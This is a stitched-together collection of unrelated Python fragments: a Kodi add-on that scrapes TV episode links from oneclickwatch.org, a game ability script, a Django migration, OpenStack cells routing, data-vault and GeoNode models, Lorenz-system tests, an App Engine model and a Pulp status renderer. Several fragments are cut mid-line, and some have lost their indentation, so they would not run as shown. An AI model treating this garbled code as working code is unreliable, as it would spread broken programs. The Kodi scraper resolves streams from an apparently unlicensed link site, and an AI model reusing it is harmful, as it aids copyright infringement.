    #urllist=main.OPENURL('http://oneclickwatch.org/category/tv-shows/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/2/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/3/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/4/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/5/')
    urllist=main.batchOPENURL(('http://oneclickwatch.org/category/tv-shows/','http://oneclickwatch.org/category/tv-shows/page/2/','http://oneclickwatch.org/category/tv-shows/page/3/','http://oneclickwatch.org/category/tv-shows/page/4/','http://oneclickwatch.org/category/tv-shows/page/5/'))
    if urllist:
        urllist=main.unescapes(urllist)
        # title, post link and thumbnail for each entry on the index pages
        match=re.compile('title=".+?">([^<]+)</a></h2>.+?href=".+?<a href="(.+?)" .+?href=".+?>.+?src="(.+?)"').findall(urllist)
        dialogWait = xbmcgui.DialogProgress()
        ret = dialogWait.create('Please wait until Show list is cached.')
        totalLinks = len(match)
        loadedLinks = 0
        remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
        dialogWait.update(0,'[B]Will load instantly from now on[/B]',remaining_display)
        for name,url,thumb in match:
            # normalise HTML entities and stray punctuation in the title
            name=name.replace('\xc2\xa0','').replace('" ','').replace(' "','').replace('"','').replace("&#039;","'").replace("&amp;","and").replace("&#8217;","'").replace("amp;","and").replace("#8211;","-")
            main.addPlayTE(name,url,134,thumb,'','','','','')
            loadedLinks = loadedLinks + 1
            percent = (loadedLinks * 100)/totalLinks
            remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
            dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
            if (dialogWait.iscanceled()):
                return False
        dialogWait.close()
        del dialogWait
    main.GA("TV","Oneclickwatch")
def PLAYOCW(mname,murl):
    """Resolve and play an episode link from a oneclickwatch post.

    Scrapes the post for host links, lets urlresolver choose a source,
    then plays the resolved stream with bookmark/watch-history support.
    """
    sources=[]
    main.GA("OneclickwatchT","Watched")
    ok=True
    playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
    playlist.clear()
    xbmc.executebuiltin("XBMC.Notification(Please Wait!,Collecting Hosts,5000)")
    link=main.OPENURL(murl)
    link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','')
    match=re.compile('<p><a href=".+?" rel=".+?">(.+?)</a></p>').findall(link)
    desc=re.compile('<.+? />Plot:(.+?)<.+? />').findall(link)
    if len(desc)>0:
        descs=desc[0]
    else:
        descs=''
    thumb=re.compile('<img alt="" src="(.+?)"').findall(link)
    if len(thumb)>0:
        thumbs=thumb[0]
    else:
        thumbs=''
    main.CloseAllDialogs()
    import urlresolver
    for url in match:
        # derive a short host label (e.g. "rapidgator") for the picker
        host=re.compile("http://(.+?).com/.+?").findall(url)
        for hname in host:
            host=hname.replace('www.','')
        hosted_media = urlresolver.HostedMediaFile(url=url, title=host)
        sources.append(hosted_media)
    if (len(sources)==0):
        xbmc.executebuiltin("XBMC.Notification(Sorry!,Show doesn't have playable links,5000)")
    else:
        source = urlresolver.choose_source(sources)
        try:
            if source:
                xbmc.executebuiltin("XBMC.Notification(Please Wait!,Resolving Link,3000)")
                stream_url = main.resolve_url(source.get_url())
            else:
                stream_url = False
                return
            infoLabels =main.GETMETAEpiT(mname,thumbs,descs)
            video_type='episode'
            season=infoLabels['season']
            episode=infoLabels['episode']
            img=infoLabels['cover_url']
            fanart =infoLabels['backdrop_url']
            imdb_id=infoLabels['imdb_id']
            infolabels = { 'supports_meta' : 'true', 'video_type':video_type, 'name':str(infoLabels['title']), 'imdb_id':str(infoLabels['imdb_id']), 'season':str(season), 'episode':str(episode), 'year':str(infoLabels['year']) }
            infoL={'Title': infoLabels['title'], 'Plot': infoLabels['plot'], 'Genre': infoLabels['genre']}
            # play with bookmark
            player = playbackengine.PlayWithoutQueueSupport(resolved_url=stream_url, addon_id=addon_id, video_type=video_type, title=str(infoLabels['title']),season=str(season), episode=str(episode), year=str(infoLabels['year']),img=img,infolabels=infoL, watchedCallbackwithParams=main.WatchedCallbackwithParams,imdb_id=imdb_id)
            #WatchHistory
            if selfAddon.getSetting("whistory") == "true":
                wh.add_item(mname+' '+'[COLOR green]Oneclickwatch[/COLOR]', sys.argv[0]+sys.argv[2], infolabels=infolabels, img=img, fanart=fanart, is_folder=False)
            player.KeepAlive()
            return ok
        except:
            # NOTE(review): bare except mirrors the original behaviour of
            # swallowing resolver/playback errors and reporting success.
            return ok
def VIDEOLINKST3(mname,murl):
sources=[]
main.GA("OneclickwatchM","Watched")
ok=True
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Collecting Hosts,5000)")
link=main.OPENURL(murl)
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','')
match=re.compile('<p><a href="([^"]+?)".*?>().+?</a></p>').findall(link)
if len(match)==0:
match=re.compile('<a href="(.+?)">(.+?)</a><br />').findall(link)
desc=re.compile('<.+? />Plot:(.+?)<.+? />').findall(link)
if len(desc)>0:
descs=desc[0]
else:
descs=''
thumb=re.compile('<img alt="" src="(.+?)"').findall(link)
if len(thumb)>0:
thumbs=thumb[0]
else:
thumbs=''
main.CloseAllDialogs()
import urlresolver
for url,host in match:
print url
hosted_media = urlresolver.HostedMediaFile(url=url, title=host)
sources.append(hosted_media)
if (len(sources)==0):
xbmc.executebuiltin("XBMC.Notification(Sorry!,Show doesn't have playable links,5000)")
else:
source = urlresolver.choose_source(sources)
try:
if source:
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Resolving Link,3000)")
stream_url = main.resolve_url(source.get_url())
else:
stream_url = False
return
print stream_url
infoLabels =main.GETMETAT(mname,'','',thumbs)
video_type='movie'
season=''
episode=''
img=infoLabels['cover_url']
fanart =infoLabels['backdrop_url']
imdb_id=infoLabels['imdb_id']
infolabels = { 'supports_meta' : 'true', 'video_type':video_type, 'name':str(infoLabels['title']), 'imdb_id':str(infoLabels['imdb_id']), 'season':str(season), 'episode':str(episode), 'year':str(infoLabels['year']) }
infoL={'Title': infoLabels['title'], 'Plot': infoLabels['plot'], 'Genre': infoLabels['genre']}
# play with bookmark
from resources.universal import playbackengine
player = playbackengine.PlayWithoutQueueSupport(resolved_url=stre |
import sys
def addAbilities(core, actor, player):
    """Grant each cloaked-recovery tier the actor's level qualifies for."""
    tiers = ((10, "sp_cloaked_recovery_0"),
             (28, "sp_cloaked_recovery_1"),
             (54, "sp_cloaked_recovery_2"),
             (70, "sp_cloaked_recovery_3"),
             (86, "sp_cloaked_recovery_4"))
    for minimum_level, ability in tiers:
        if actor.getLevel() >= minimum_level:
            actor.addAbility(ability)
    return
def removeAbilities(core, actor, player):
    """Revoke every cloaked-recovery ability tier, regardless of level."""
    # Tier names mirror the list granted by addAbilities above.
    for tier in range(5):
        actor.removeAbility("sp_cloaked_recovery_%d" % tier)
    return
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-01 13:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add generic-relation target fields (id + content type) to Activity."""

    dependencies = [
        ('contenttypes', '0002_remove_content_type_name'),
        ('forum', '0004_activity_brick_name'),
    ]

    operations = [
        migrations.AddField(
            model_name='activity',
            name='target_id',
            field=models.PositiveSmallIntegerField(default=0, null=True),
        ),
        migrations.AddField(
            model_name='activity',
            name='target_type',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType'),
        ),
    ]
|
or a specific
single cell.
'target_cell' can be a full cell name like 'api!child-cell' or it can
be an instance of the CellState class if the target is a neighbor cell.
"""
message_type = 'targeted'
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, target_cell, **kwargs):
super(_TargetedMessage, self).__init__(msg_runner, ctxt,
method_name, method_kwargs, direction, **kwargs)
if isinstance(target_cell, cells_state.CellState):
# Neighbor cell or ourselves. Convert it to a 'full path'.
if target_cell.is_me:
target_cell = self.our_path_part
else:
target_cell = '%s%s%s' % (self.our_path_part,
_PATH_CELL_SEP,
target_cell.name)
self.target_cell = target_cell
self.base_attrs_to_json.append('target_cell')
def _get_next_hop(self):
"""Return the cell name for the next hop. If the next hop is
the current cell, return None.
"""
if self.target_cell == self.routing_path:
return self.state_manager.my_cell_state
target_cell = self.target_cell
routing_path = self.routing_path
current_hops = routing_path.count(_PATH_CELL_SEP)
next_hop_num = current_hops + 1
dest_hops = target_cell.count(_PATH_CELL_SEP)
if dest_hops < current_hops:
reason_args = {'target_cell': target_cell,
'routing_path': routing_path}
reason = _("destination is %(target_cell)s but routing_path "
"is %(routing_path)s") % reason_args
raise exception.CellRoutingInconsistency(reason=reason)
dest_name_parts = target_cell.split(_PATH_CELL_SEP)
if (_PATH_CELL_SEP.join(dest_name_parts[:next_hop_num]) !=
routing_path):
reason_args = {'target_cell': target | _cell,
'routing_path': routing_path}
reason = _("destination is %(target_cell)s but routing_path "
"is %(routing_path)s") % | reason_args
raise exception.CellRoutingInconsistency(reason=reason)
next_hop_name = dest_name_parts[next_hop_num]
if self.direction == 'up':
next_hop = self.state_manager.get_parent_cell(next_hop_name)
else:
next_hop = self.state_manager.get_child_cell(next_hop_name)
if not next_hop:
cell_type = 'parent' if self.direction == 'up' else 'child'
reason_args = {'cell_type': cell_type,
'target_cell': target_cell}
reason = _("Unknown %(cell_type)s when routing to "
"%(target_cell)s") % reason_args
raise exception.CellRoutingInconsistency(reason=reason)
return next_hop
    def process(self):
        """Process a targeted message. This is called for all cells
        that touch this message. If the local cell is the one that
        created this message, we reply directly with a Response instance.
        If the local cell is not the target, an eventlet queue is created
        and we wait for the response to show up via another thread
        receiving the Response back.
        Responses to targeted messages are routed directly back to the
        source. No eventlet queues are created in intermediate hops.
        All exceptions for processing the message across the whole
        routing path are caught and encoded within the Response and
        returned to the caller.
        """
        try:
            next_hop = self._get_next_hop()
        except Exception as exc:
            exc_info = sys.exc_info()
            LOG.exception(_("Error locating next hop for message: %(exc)s"),
                          {'exc': exc})
            return self._send_response_from_exception(exc_info)
        if next_hop.is_me:
            # Final destination.
            response = self._process_locally()
            return self._send_response(response)
        # Need to forward via neighbor cell.
        if self.need_response and self.source_is_us():
            # A response is needed and the source of the message is
            # this cell. Create the eventlet queue.
            self._setup_response_queue()
            wait_for_response = True
        else:
            wait_for_response = False
        try:
            # This is inside the try block, so we can encode the
            # exception and return it to the caller.
            if self.hop_count >= self.max_hop_count:
                raise exception.CellMaxHopCountReached(
                    hop_count=self.hop_count)
            next_hop.send_message(self)
        except Exception as exc:
            exc_info = sys.exc_info()
            err_str = _("Failed to send message to cell: %(next_hop)s: "
                        "%(exc)s")
            LOG.exception(err_str, {'exc': exc, 'next_hop': next_hop})
            # Drop the queue we may have just created; nothing will
            # ever arrive on it now.
            self._cleanup_response_queue()
            return self._send_response_from_exception(exc_info)
        if wait_for_response:
            # Targeted messages only have 1 response.
            remote_response = self._wait_for_json_responses()[0]
            return Response.from_json(remote_response)
        # Intermediate hop (or no response requested): returns None.
class _BroadcastMessage(_BaseMessage):
"""A broadcast message. This means to call a method in every single
cell going in a certain direction.
"""
message_type = 'broadcast'
    def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
            direction, run_locally=True, **kwargs):
        """Create a broadcast message fanned out in ``direction``.

        :param run_locally: whether the creating cell also processes the
            message itself, in addition to forwarding it.
        """
        super(_BroadcastMessage, self).__init__(msg_runner, ctxt,
                method_name, method_kwargs, direction, **kwargs)
        # The local cell creating this message has the option
        # to be able to process the message locally or not.
        self.run_locally = run_locally
        self.is_broadcast = True
def _get_next_hops(self):
"""Set the next hops and return the number of hops. The next
hops may include ourself.
"""
if self.hop_count >= self.max_hop_count:
return []
if self.direction == 'down':
return self.state_manager.get_child_cells()
else:
return self.state_manager.get_parent_cells()
def _send_to_cells(self, target_cells):
"""Send a message to multiple cells."""
for cell in target_cells:
cell.send_message(self)
    def _send_json_responses(self, json_responses):
        """Responses to broadcast messages always need to go to the
        neighbor cell from which we received this message.  That
        cell aggregates the responses and makes sure to forward them
        to the correct source.
        """
        # neighbor_only/fanout route the batch one hop back toward the
        # source instead of directly to it — aggregation happens per hop.
        return super(_BroadcastMessage, self)._send_json_responses(
                json_responses, neighbor_only=True, fanout=True)
def process(self):
"""Process a broadcast message. This is called for all cells
that touch this message.
The message is sent to all cells in the certain direction and
the creator of this message has the option of whether or not
to process it locally as well.
If responses from all cells are required, each hop creates an
eventlet queue and waits for responses from its immediate
neighbor cells. All responses are then aggregated into a
single list and are returned to the neighbor cell until the
source is reached.
When the source is reached, a list of Response instances are
returned to the caller.
All exceptions for processing the message across the whole
routing path are caught and encoded within the Response and
returned to the caller. It is possible to get a mix of
successful responses and failure responses. The caller is
responsible for dealing with this.
"""
try:
next_hops = self._get_next_hops()
except Exception as exc:
exc_info = sys.exc_info()
LOG.ex |
from pyelt.datalayers.database import Column, Columns
from pyelt.datalayers.dv import Sat, DvEntity, Link, Hub, HybridSat, LinkReference
class Role:
    # Marker class (no behavior); tags entity classes as a 'Role'.
    # Naming appears to mirror HL7 RIM Role/Act/Participation — TODO confirm.
    pass
class Act:
    # Marker class (no behavior); tags entity classes as an 'Act'.
    pass
class Participation:
    # Marker class (no behavior); tags link classes as a 'Participation'.
    pass
class Zorgverlener(DvEntity, Role):
    """Data-vault entity (hub + satellites) for a care provider."""
    class Default(Sat):
        # Registration number and validity period.
        zorgverlenernummer = Columns.TextColumn()
        aanvangsdatum = Columns.DateColumn()
        einddatum = Columns.DateColumn()
    class Personalia(Sat):
        # Personal name details of the care provider.
        achternaam = Columns.TextColumn()
        tussenvoegsels = Columns.TextColumn()
        voorletters = Columns.TextColumn()
        voornaam = Columns.TextColumn()
        bijnaam = Columns.TextColumn()
    # not used in dwh2.0; used here for the tests run in test03r_domain.py
    class ContactGegevens(HybridSat):
        # Hybrid satellite: one row per contact type listed in Types.
        class Types(HybridSat.Types):
            telefoon = 'telefoon'
            mobiel = 'mobiel'
            mobiel2 = 'mobiel2'
        telnummer = Columns.TextColumn()
        datum = Columns.DateColumn()
        landcode = Columns.TextColumn()
    default = Default()
    personalia = Personalia()
    contactgegevens = ContactGegevens()
class Adres(DvEntity, Role):
    """Data-vault entity for a (Dutch) address."""
    class Default(Sat):
        postcode = Columns.TextColumn()
        huisnummer = Columns.IntColumn()
        huisnummer_toevoeging = Columns.TextColumn()
        straat = Columns.TextColumn()
        plaats = Columns.TextColumn()
        land = Columns.TextColumn()
    default = Default()
class Zorginstelling(DvEntity, Role):
    """Data-vault entity for a care institution."""
    class Default(Sat):
        zorginstellings_naam = Columns.TextColumn()
        zorginstellings_nummer = Columns.TextColumn()
    default = Default()
# This is a link:
class Zorgverlener_Zorginstelling_Link(Link, Participation):
    # Connects a care provider to a care institution (participation link).
    zorgverlener = LinkReference(Zorgverlener)
    zorginstelling = LinkReference(Zorginstelling)
# This is a hybrid (typed) link:
class Zorgverlener_Adres_Link(Link):
    # Connects a care provider to an address, typed by usage.
    class Types:
        post = 'post'
        bezoek = 'bezoek'
        woon = 'woon'
    zorgverlener = LinkReference(Zorgverlener)
    adres = LinkReference(Adres)
class Zorginstelling_Adres_Link(Link):
    # Connects a care institution to an address.
    zorginstelling = LinkReference(Zorginstelling)
    adres = LinkReference(Adres)
|
s.get()
    def get_absolute_url(self):
        """URL of the layer detail page, keyed by the service typename."""
        return reverse('layer_detail', args=(self.service_typename,))
def attribute_config(self):
# Get custom attribute sort order and labels if any
cfg = {}
visible_attributes = self.attribute_set.visible()
if (visible_attributes.count() > 0):
cfg["getFeatureInfo"] = {
"fields": [l.attribute for l in visible_attributes],
"propertyNames": dict([(l.attribute, l.attribute_label) for l in visible_attributes])
}
return cfg
def __str__(self):
if self.typename is not None:
return "%s Layer" % self.service_typename.encode('utf-8')
elif self.name is not None:
return "%s Layer" % self.name
else:
return "Unamed Layer"
    class Meta:
        # custom permissions,
        # change and delete are standard in django
        permissions = (
            ('view_layer','Can view'),
            ('change_layer_permissions',"Can change permissions"),
            ('edit_layer_style','can edit style'),
            ('edit_layer_metadata','can edit metadata'),
            ('edit_layer_data','can edit data'),
            ('download_layer','can download'),
            ('download_layer_metadata','can download metadata'))
    # Permission Level Constants
    # LEVEL_NONE inherited
    # Symbolic names for the permission bundles granted to users/groups.
    LEVEL_READ = 'layer_readonly'
    LEVEL_WRITE = 'layer_readwrite'
    LEVEL_ADMIN = 'layer_admin'
    def maps(self):
        """Return the MapLayers that reference this layer by typename."""
        # Imported locally to avoid a circular import with geonode.maps.
        from geonode.maps.models import MapLayer
        return MapLayer.objects.filter(name=self.typename)
@property
def class_name(self):
return self.__class__.__name__
class Layer_Styles(models.Model):
    # Join table linking layers to their styles (many-to-many).
    layer = models.ForeignKey(Layer)
    style = models.ForeignKey(Style)
class UploadSession(models.Model):
    """Helper class to keep track of uploads.
    """
    date = models.DateTimeField(auto_now=True)
    user = models.ForeignKey(settings.AUTH_USER_MODEL)
    processed = models.BooleanField(default=False)
    error = models.TextField(blank=True, null=True)
    traceback = models.TextField(blank=True, null=True)
    def successful(self):
        """Return True when processing finished without recording an error.

        Bug fix: this previously read ``self.errors``, which is not a
        field on this model (the field is ``error``), so every call
        raised AttributeError.
        """
        return self.processed and self.error is None
class LayerFile(models.Model):
    """Helper class to store original files.
    """
    # Upload batch this file arrived in.
    upload_session = models.ForeignKey(UploadSession)
    name = models.CharField(max_length=255)
    # base marks the primary file of the upload — presumably the main
    # file of a multi-file set (e.g. shapefile); confirm against uploader.
    base = models.BooleanField(default=False)
    file = models.FileField(upload_to='layers', max_length=255)
class AttributeManager(models.Manager):
    """Helper class to access filtered attributes
    """
    def visible(self):
        # Visible attributes only, in their configured display order.
        # NOTE(review): get_query_set is the pre-Django-1.6 spelling; on
        # newer Django this must be get_queryset — confirm target version.
        return self.get_query_set().filter(
            visible=True).order_by('display_order')
class Attribute(models.Model):
    """
    Auxiliary model for storing layer attributes.
    This helps reduce the need for runtime lookups
    to other servers, and lets users customize attribute titles,
    sort order, and visibility.
    """
    # Owning layer; attributes are reached via layer.attribute_set.
    layer = models.ForeignKey(
        Layer,
        blank=False,
        null=False,
        unique=False,
        related_name='attribute_set')
    attribute = models.CharField(
        _('attribute name'),
        help_text=_('name of attribute as stored in shapefile/spatial database'),
        max_length=255,
        blank=False,
        null=True,
        unique=False)
    description = models.CharField(
        _('attribute description'),
        help_text=_('description of attribute to be used in metadata'),
        max_length=255,
        blank=True,
        null=True)
    attribute_label = models.CharField(
        _('attribute label'),
        help_text=_('title of attribute as displayed in GeoNode'),
        max_length=255,
        blank=False,
        null=True,
        unique=False)
    attribute_type = models.CharField(
        _('attribute type'),
        help_text=_('the data type of the attribute (integer, string, geometry, etc)'),
        max_length=50,
        blank=False,
        null=False,
        default='xsd:string',
        unique=False)
    visible = models.BooleanField(
        _('visible?'),
        help_text=_('specifies if the attribute should be displayed in identify results'),
        default=True)
    display_order = models.IntegerField(
        _('display order'),
        help_text=_('specifies the order in which attribute should be displayed in identify results'),
        default=1)
    # statistical derivations — stored as text, 'NA' meaning not computed
    count = models.IntegerField(
        _('count'),
        help_text=_('count value for this field'),
        default=1)
    min = models.CharField(
        _('min'),
        help_text=_('minimum value for this field'),
        max_length=255,
        blank=False,
        null=True,
        unique=False,
        default='NA')
    max = models.CharField(
        _('max'),
        help_text=_('maximum value for this field'),
        max_length=255,
        blank=False,
        null=True,
        unique=False,
        default='NA')
    average = models.CharField(
        _('average'),
        help_text=_('average value for this field'),
        max_length=255,
        blank=False,
        null=True,
        unique=False,
        default='NA')
    median = models.CharField(
        _('median'),
        help_text=_('median value for this field'),
        max_length=255,
        blank=False,
        null=True,
        unique=False,
        default='NA')
    stddev = models.CharField(
        _('standard deviation'),
        help_text=_('standard deviation for this field'),
        max_length=255,
        blank=False,
        null=True,
        unique=False,
        default='NA')
    sum = models.CharField(
        _('sum'),
        help_text=_('sum value for this field'),
        max_length=255,
        blank=False,
        null=True,
        unique=False,
        default='NA')
    unique_values = models.TextField(
        _('unique values for this field'),
        null=True,
        blank=True,
        default='NA')
    last_stats_updated = models.DateTimeField(
        _('last modified'),
        default=datetime.now,
        help_text=_('date when attribute statistics were last updated')) # passing the method itself, not the result, so it is evaluated at save time
    objects = AttributeManager()
    def __str__(self):
        # NOTE(review): the conditional binds looser than %, so this
        # returns ("%s" % encoded label) when a label exists, otherwise
        # the raw encoded attribute name — confirm this is intended.
        return "%s" % self.attribute_label.encode(
            "utf-8") if self.attribute_label else self.attribute.encode("utf-8")
    def unique_values_as_list(self):
        """Return the stored comma-separated unique values as a list."""
        return self.unique_values.split(',')
def pre_save_layer(instance, sender, **kwargs):
if kwargs.get('raw', False):
instance.owner = instance.resourcebase_ptr.owner
instance.uuid = instance.resourcebase_ptr.uuid
instance.bbox_x0 = instance.resourcebase_ptr.bbox_x0
instance.bbox_x1 = instance.resourcebase_ptr.bbox_x1
instance.bbox_y0 = instance.resourcebase_ptr.bbox_y0
instance.bbox_y1 = instance.resourcebase_ptr.bbox_y1
if instance.abstract == '' or instance.abstract is None:
instance.abstract = 'No abstract provided'
if instance.title == '' or instance.title is None:
instance.title = instance.name
# Set a default user for accountstream to work correctly.
if instance.owner is None:
instance.owner = get_valid_user()
if instance.uuid == '':
instance.uuid = str(uuid.uuid1())
if instance.typename is None:
# Set a sensible default for the typename
instance.typename = 'geonode:%s' % instance.name
base_file = instance.get_base_file()
if base_file is not None:
extension = '.%s' % base_file.name
if extension in vec_exts:
instance.storeType = 'dataStore'
elif extension in cov_exts:
instance.storeType = 'coverageStore'
# Set sane defaults for None in bbox fields.
if instance.bbox_x0 is None:
instance.bbox_x0 = -180
if instance.bbox_x1 is None:
instance.bbox_x1 = 180
if instance.bbox_y0 is None:
instance.bbox_y0 = -90
if instance.bbox_y1 is None:
instance.bbox_y1 = 90
bbox = [
instance.bbox_x0,
instance.bbox_x1,
instance.b |
import unittest
import scipy
from SloppyCell.ReactionNetworks import *
# Build the classic Lorenz system as a SloppyCell network:
#   dx/dt = sigma*(y - x)
#   dy/dt = r*x - y - x*z
#   dz/dt = x*y - b*z
lorenz = Network('lorenz')
lorenz.add_compartment('basic')
lorenz.add_species('x', 'basic', 0.5)
lorenz.add_species('y', 'basic', 0.5)
lorenz.add_species('z', 'basic', 0.5)
lorenz.add_parameter('sigma', 1.0)
lorenz.add_parameter('r', 2.0)
lorenz.add_parameter('b', 2.0)
lorenz.add_rate_rule('x', 'sigma*(y-x)')
lorenz.add_rate_rule('y', 'r*x - y - x*z')
lorenz.add_rate_rule('z', 'x*y - b*z')
class test_fixedpoints(unittest.TestCase):
    # NOTE(review): scipy.sqrt was deprecated and later removed from
    # SciPy's top-level namespace; these tests assume a legacy SciPy.
    def test_basic(self):
        """ Test basic fixed-point finding """
        net = lorenz.copy('test')
        fp = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1], with_logs=False)
        # This should find the fixed-point [sqrt(2), sqrt(2), 1]
        self.assertAlmostEqual(fp[0], scipy.sqrt(2), 6, 'Failed on basic 1,0.')
        self.assertAlmostEqual(fp[1], scipy.sqrt(2), 6, 'Failed on basic 1,1.')
        self.assertAlmostEqual(fp[2], 1, 6, 'Failed on basic 1,2.')
        fp = Dynamics.dyn_var_fixed_point(net, dv0=[-0.1,-0.1,-0.1],
                                          with_logs=False)
        # This should find the fixed-point [0, 0, 0]
        self.assertAlmostEqual(fp[0], 0, 6, 'Failed on basic 2,0.')
        self.assertAlmostEqual(fp[1], 0, 6, 'Failed on basic 2,1.')
        self.assertAlmostEqual(fp[2], 0, 6, 'Failed on basic 2,2.')
    def test_withlogs(self):
        """ Test fixed-point finding with logs """
        net = lorenz.copy('test')
        fp = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1], with_logs=True)
        # This should find the fixed-point [sqrt(2), sqrt(2), 1]
        self.assertAlmostEqual(fp[0], scipy.sqrt(2), 6, 'Failed on logs 1,0.')
        self.assertAlmostEqual(fp[1], scipy.sqrt(2), 6, 'Failed on logs 1,1.')
        self.assertAlmostEqual(fp[2], 1, 6, 'Failed on logs 1,2.')
        fp = Dynamics.dyn_var_fixed_point(net, dv0=[0.1,0.1,0.1],
                                          with_logs=True)
        # This should find the fixed-point [0, 0, 0]
        self.assertAlmostEqual(fp[0], 0, 6, 'Failed on logs 2,0.')
        self.assertAlmostEqual(fp[1], 0, 6, 'Failed on logs 2,1.')
        self.assertAlmostEqual(fp[2], 0, 6, 'Failed on logs 2,2.')
    def test_stability(self):
        # Stability classification: -1 == stable, 0 == saddle.
        net = lorenz.copy('test')
        # The sqrt(b*(r-1)), sqrt(b*(r-1)), r-1 fixed point is stable for r < rH
        # Strogatz, Nonlinear Dynamics and Chaos (p. 316)
        fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1],
                                                  stability=True)
        self.assertEqual(stable, -1, 'Failed to classify stable fixed point')
        # (0,0,0) is a saddle here
        fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[0.01,0.01,0.01],
                                                  stability=True)
        self.assertEqual(stable, 0, 'Failed to classify saddle')
        # (0,0,0) is a stable node here
        net.set_var_ic('r', 0.5)
        fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[0.1,0.1,0.1],
                                                  stability=True)
        self.assertEqual(stable, -1, 'Failed to classify stable fixed point')
        # Now make the far fixed point a saddle...
        net.set_var_ic('sigma', 6.0)
        net.set_var_ic('r', 25)
        fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[10,10,10],
                                                  stability=True)
        self.assertEqual(stable, 0, 'Failed to classify saddle')
# NOTE(review): unittest.makeSuite is deprecated (removed in Python 3.13);
# acceptable for the legacy environment this file targets.
suite = unittest.makeSuite(test_fixedpoints)
if __name__ == '__main__':
    unittest.main()
|
#this model represents a request in our system
from google.appengine.ext import ndb
from datetime import datetime
from datetime import timedelta
class Request(ndb.Model):
    """A help request stored in the App Engine datastore."""
    city = ndb.StringProperty()
    phone = ndb.StringProperty()
    date = ndb.DateTimeProperty()
    description = ndb.StringProperty()
    isCarNeeded = ndb.BooleanProperty()
    @classmethod
    def add(cls, cit, phoneNum, desc, carNeeded):
        """Create and persist a new Request.

        Fixed: the first parameter of this classmethod was named
        ``self``; it receives the class, so it is now ``cls`` and the
        instance is created via ``cls()``. Callers are unaffected.
        """
        req = cls()
        req.city = cit
        req.phone = phoneNum
        req.description = desc
        req.isCarNeeded = carNeeded
        # Stored in UTC; convert to local time (Israel, GMT+2/+3) at
        # display time rather than here.
        req.date = datetime.utcnow()
        req.put()
from pulp_puppet.common import constants
from pulp_puppet.common.publish_progress import PublishProgressReport
from pulp_puppet.common.sync_progress import SyncProgressReport
class PuppetStatusRenderer(StatusRenderer):
    def __init__(self, context):
        """Track last-seen state per step and build the UI widgets."""
        super(PuppetStatusRenderer, self).__init__(context)
        # Sync Steps
        self.sync_metadata_last_state = constants.STATE_NOT_STARTED
        self.sync_modules_last_state = constants.STATE_NOT_STARTED
        # Publish Steps
        self.publish_modules_last_state = constants.STATE_NOT_STARTED
        self.publish_metadata_last_state = constants.STATE_NOT_STARTED
        self.publish_http_last_state = constants.STATE_NOT_STARTED
        self.publish_https_last_state = constants.STATE_NOT_STARTED
        # UI Widgets
        self.sync_metadata_bar = self.prompt.create_progress_bar()
        self.sync_modules_bar = self.prompt.create_progress_bar()
        self.publish_modules_bar = self.prompt.create_progress_bar()
        self.publish_metadata_spinner = self.prompt.create_spinner()
    def display_report(self, progress_report):
        """Render whichever sync/publish sections the report contains."""
        # Sync Steps
        if constants.IMPORTER_ID in progress_report:
            sync_report = SyncProgressReport.from_progress_dict(progress_report[constants.IMPORTER_ID])
            self._display_sync_metadata_step(sync_report)
            self._display_sync_modules_step(sync_report)
        # Publish Steps
        if constants.DISTRIBUTOR_ID in progress_report:
            publish_report = PublishProgressReport.from_progress_dict(progress_report[constants.DISTRIBUTOR_ID])
            self._display_publish_modules_step(publish_report)
            self._display_publish_metadata_step(publish_report)
            self._display_publish_http_https_step(publish_report)
    def _display_sync_metadata_step(self, sync_report):
        """Render progress for the metadata-download step of a sync."""
        # Do nothing if it hasn't started yet or has already finished
        if sync_report.metadata_state == constants.STATE_NOT_STARTED or \
           self.sync_metadata_last_state in constants.COMPLETE_STATES:
            return
        # Only render this on the first non-not-started state
        if self.sync_metadata_last_state == constants.STATE_NOT_STARTED:
            self.prompt.write(_('Downloading metadata...'), tag='download-metadata')
        # Same behavior for running or success
        if sync_report.metadata_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
            items_done = sync_report.metadata_query_finished_count
            items_total = sync_report.metadata_query_total_count
            item_type = _('Metadata Query')
            self._render_itemized_in_progress_state(items_done, items_total,
                item_type, self.sync_metadata_bar, sync_report.metadata_state)
        # The only state left to handle is if it failed
        else:
            self.prompt.render_failure_message(_('... failed'))
            self.prompt.render_spacer()
            self._render_error(sync_report.metadata_error_message,
                               sync_report.metadata_exception,
                               sync_report.metadata_traceback)
        # Before finishing update the state
        self.sync_metadata_last_state = sync_report.metadata_state
    def _display_sync_modules_step(self, sync_report):
        """Render progress for the module-download step of a sync."""
        # Do nothing if it hasn't started yet or has already finished
        if sync_report.modules_state == constants.STATE_NOT_STARTED or \
           self.sync_modules_last_state in constants.COMPLETE_STATES:
            return
        # Only render this on the first non-not-started state
        if self.sync_modules_last_state == constants.STATE_NOT_STARTED:
            self.prompt.write(_('Downloading new modules...'), tag='downloading')
        # Same behavior for running or success
        if sync_report.modules_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
            # Errored modules still count as processed for the bar.
            items_done = sync_report.modules_finished_count + sync_report.modules_error_count
